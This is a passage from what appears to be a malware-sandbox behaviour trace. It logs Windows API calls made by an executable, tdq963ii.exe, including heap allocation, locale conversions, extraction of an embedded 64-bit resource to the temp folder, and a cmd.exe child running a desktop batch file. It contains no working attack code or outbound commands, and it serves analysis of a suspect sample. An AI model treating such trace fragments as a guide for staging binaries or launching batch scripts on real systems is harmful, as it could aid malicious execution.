(hModule=0x76d30000, lpProcName="CompareStringEx") returned 0x76dc46b1 [0136.721] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatEx") returned 0x76dd6676 [0136.721] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0136.722] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatEx") returned 0x76dd65f1 [0136.722] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0136.722] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocaleName") returned 0x76dc47e1 [0136.722] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0136.722] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentPackageId") returned 0x0 [0136.722] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount64") returned 0x76d5eee0 [0136.722] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0136.722] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0136.723] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x3bc) returned 0x5160c8 [0136.723] GetCurrentThreadId () returned 0x99c [0136.724] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x18) returned 0x516490 [0136.724] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x800) returned 0x5164b0 [0136.724] GetStartupInfoW (in: lpStartupInfo=0x18fed8 | out: lpStartupInfo=0x18fed8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula \"jnwdui.dll.mui\" -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40ad42, hStdOutput=0xe6394c38, hStdError=0x0)) [0136.724] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0136.724] GetFileType (hFile=0x3) returned 0x2 [0136.725] GetStdHandle (nStdHandle=0xfffffff5) returned 0x80 [0136.725] GetFileType (hFile=0x80) returned 0x3 [0136.725] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0136.725] GetFileType (hFile=0xb) returned 0x2 [0136.725] GetCommandLineW () returned="tdq963ii.exe -accepteula \"jnwdui.dll.mui\" -nobanner" [0136.725] GetEnvironmentStringsW () returned 0x516cb8* [0136.726] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xb84) returned 0x517848 [0136.728] FreeEnvironmentStringsW (penv=0x516cb8) returned 1 [0136.729] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x426ea0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0136.729] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x78) returned 0x50f8e8 [0136.731] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0xa0) returned 0x516cb8 [0136.731] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x3e) returned 0x5183f0 [0136.733] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x6c) returned 0x516d60 [0136.733] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x6e) returned 0x516dd8 [0136.733] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x78) returned 0x50f968 [0136.733] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x62) returned 0x516e50 [0136.733] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x2e) returned 0x516ec0 [0136.733] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x48) returned 0x516ef8 [0136.733] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x28) returned 0x516f48 [0136.733] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x28) returned 0x516f78 [0136.733] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x1a) returned 0x515a98 [0136.734] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x4a) returned 0x516fa8 [0136.734] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x72) returned 0x50f9e8 [0136.734] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x30) returned 0x517000 [0136.734] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x2e) returned 0x517038 [0136.734] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x1c) returned 0x515ac0 [0136.734] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0xd2) returned 0x517070 [0136.734] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x7c) returned 0x517150 [0136.734] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x36) returned 0x5171d8 [0136.734] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x3a) returned 0x518438 [0136.734] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x90) returned 0x517218 [0136.734] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x24) returned 0x5172b0 [0136.734] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x30) returned 0x5172e0 [0136.734] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x36) returned 0x517318 [0136.734] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x48) returned 0x517358 [0136.734] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x52) returned 0x5173a8 [0136.734] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x3c) returned 0x518480 [0136.734] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x517408 [0136.734] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x82) returned 0x517428 [0136.735] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x2e) returned 0x5174b8 [0136.735] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x1e) returned 0x515ae8 [0136.735] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x2c) returned 0x5174f0 [0136.735] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x54) returned 0x517528 [0136.735] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x52) returned 0x517588 [0136.735] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x2a) returned 0x5175e8 [0136.735] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x3c) returned 0x5184c8 [0136.735] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x54) returned 0x517620 [0136.735] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x24) returned 0x517680 [0136.735] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x30) returned 0x5176b0 [0136.735] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x8c) returned 0x5176e8 [0136.735] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x517848 | out: hHeap=0x500000) returned 1 [0136.741] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x800) returned 0x5193d8 [0136.741] GetLastError () returned 0x0 [0136.741] SetLastError (dwErrCode=0x0) [0136.741] GetLastError () returned 0x0 [0136.741] SetLastError (dwErrCode=0x0) [0136.741] GetLastError () returned 0x0 [0136.741] SetLastError (dwErrCode=0x0) [0136.742] GetACP () returned 0x4e4 [0136.742] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x220) returned 0x519be0 [0136.742] GetLastError () returned 0x0 [0136.742] SetLastError (dwErrCode=0x0) [0136.742] IsValidCodePage (CodePage=0x4e4) returned 1 [0136.742] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fecc | out: lpCPInfo=0x18fecc) returned 1 [0136.742] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f994 | out: lpCPInfo=0x18f994) returned 1 [0136.744] GetLastError () returned 0x0 [0136.744] SetLastError (dwErrCode=0x0) [0136.745] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0136.747] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f718, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0136.747] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f9a8 | out: lpCharType=0x18f9a8) returned 1 [0136.747] GetLastError () returned 0x0 [0136.747] SetLastError (dwErrCode=0x0) [0136.747] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0136.747] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0138.338] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0138.339] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4d8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0138.339] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18fca8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ¨M9æäþ\x18", lpUsedDefaultChar=0x0) returned 256 [0138.339] GetLastError () returned 0x0 [0138.339] SetLastError (dwErrCode=0x0) [0138.340] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0138.340] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0138.340] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0138.340] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0138.340] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18fba8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ¨M9æäþ\x18", lpUsedDefaultChar=0x0) returned 256 [0138.340] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x80) returned 0x519e08 [0138.341] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0138.341] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40f584) returned 0x0 [0138.342] RtlSizeHeap (HeapHandle=0x500000, Flags=0x0, MemoryPointer=0x519e08) returned 0x80 [0138.343] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0138.343] GetProcAddress (hModule=0x76d30000, lpProcName="IsWow64Process") returned 0x76d4195e [0138.343] GetCurrentProcess () returned 0xffffffff [0138.343] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x18ff34 | out: Wow64Process=0x18ff34) returned 1 [0138.343] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fd28, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0138.343] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x18fb20, nSize=0x104 | out: lpDst="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x25 [0138.347] FindResourceW (hModule=0x0, lpName="RCHANDLE64", lpType="BINRES") returned 0x476060 [0138.347] LoadResource (hModule=0x0, hResInfo=0x476060) returned 0x43c648 [0138.347] SizeofResource (hModule=0x0, hResInfo=0x476060) returned 0x37490 [0138.347] LockResource (hResData=0x43c648) returned 0x43c648 [0138.347] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x18) returned 0x519e90 [0138.348] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\tdq963ii64.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\tdq963ii64.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x18f95c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0139.592] GetLastError () returned 0x20 [0139.592] GetLastError () returned 0x20 [0139.592] SetLastError (dwErrCode=0x20) [0139.592] GetLastError () returned 0x20 [0139.592] SetLastError (dwErrCode=0x20) [0139.592] GetLastError () returned 0x20 [0139.592] SetLastError (dwErrCode=0x20) [0139.593] GetLastError () returned 0x20 [0139.593] SetLastError (dwErrCode=0x20) [0139.593] GetLastError () returned 0x20 [0139.593] SetLastError (dwErrCode=0x20) [0139.593] GetLastError () returned 0x20 [0139.593] SetLastError (dwErrCode=0x20) [0139.593] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1000) returned 0x519eb0 [0139.595] WriteFile (in: hFile=0x80, lpBuffer=0x18ea08*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x18e334, lpOverlapped=0x0 | out: lpBuffer=0x18ea08*, lpNumberOfBytesWritten=0x18e334*=0x49, lpOverlapped=0x0) returned 1 [0139.596] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5193d8 | out: hHeap=0x500000) returned 1 [0139.596] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18fedc | out: phModule=0x18fedc) returned 0 [0139.596] ExitProcess (uExitCode=0x1) [0139.597] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5160c8 | out: hHeap=0x500000) returned 1 Process: id = "140" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x36835000" os_pid = "0x24c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa7c" cmd_line = "cmd /c \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\"\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], 